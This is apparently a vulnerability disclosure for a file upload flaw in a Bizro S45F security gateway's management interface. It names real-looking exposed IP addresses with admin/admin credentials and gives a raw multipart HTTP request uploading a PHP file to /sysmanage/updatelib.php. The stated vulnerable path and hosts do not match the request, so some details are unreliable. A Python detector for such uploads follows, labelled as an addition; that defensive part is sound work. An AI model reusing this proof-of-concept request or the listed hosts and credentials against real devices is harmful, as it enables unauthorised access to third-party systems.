Key vulnerability information

Vulnerability description

Vendor: 北京贝桔网络科技有限公司 (Baizhuo Network)
Product: Bizro Networks Smart S45F Multi-Service Security Gateway Intelligent Management Platform
Vulnerability type: File upload vulnerability

Target information

Official website: https://www.bizoro.com/
Version: S45
Vulnerable path: /sysmanage/changelogo.php
IP: https://103.121.164.62:8443/
Username/password: admin/admin

POC (Proof of Concept)

```http
POST /sysmanage/updatelib.php? HTTP/1.1
Host: 222.180.2.66:8443
Cookie: PHPSESSID=c36d5527fd784aa29748b3b3c50be7bc
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------------------------42328904123665875270630079328
Content-Length: 715
Origin: https://222.180.2.66:8443
Referer: https://222.180.2.66:8443/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="ck"

radhttp
----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php"
Content-Type: application/octet-stream

----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hid_ftp_ip"
```
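A detection check for the request pattern in the PoC, as an added example that is not part of the original page or the vendor's code: it parses a multipart/form-data body posted under /sysmanage/ and reports file parts whose filename carries a server-executable extension, including double-extension and trailing-dot variants. The function names, the extension list, the boundary and the sample body are assumptions constructed for illustration.

```python
import email
from urllib.parse import urlsplit

# Assumption: extensions a PHP-backed appliance may pass to the interpreter.
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
WATCHED_PREFIX = "/sysmanage/"   # directory of both endpoints named on the page

def risky_extension(filename):
    """Return the first executable extension found anywhere in the name, else None."""
    name = filename.replace("\x00", "").replace("\\", "/").rsplit("/", 1)[-1]
    name = name.strip().rstrip(". ").lower()
    for ext in name.split(".")[1:]:          # every segment: catches logo.php.jpg
        if ext in EXEC_EXT:
            return ext
    return None

def inspect_upload(path, content_type, body):
    """Return (field, filename, extension) findings for one multipart POST body."""
    if not urlsplit(path).path.startswith(WATCHED_PREFIX):
        return []
    msg = email.message_from_bytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    if not msg.is_multipart():
        return []
    findings = []
    for part in msg.get_payload():
        filename = part.get_filename()
        if filename is None:                 # ordinary form field such as "ck"
            continue
        ext = risky_extension(filename)
        if ext:
            field = part.get_param("name", header="content-disposition")
            findings.append((field, filename, ext))
    return findings

# Constructed sample with the same part layout as the request above.
BOUNDARY = "----constructedBoundary42"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="ck"', "", "radhttp",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php"',
    "Content-Type: application/octet-stream", "", "constructed placeholder content",
    "--" + BOUNDARY + "--", "",
]).encode()

if __name__ == "__main__":
    ct = "multipart/form-data; boundary=" + BOUNDARY
    print(inspect_upload("/sysmanage/updatelib.php?", ct, SAMPLE_BODY))
```

The same check can run in a reverse proxy or over captured request bodies; a finding on these management endpoints warrants reviewing the device's web root for unexpected files.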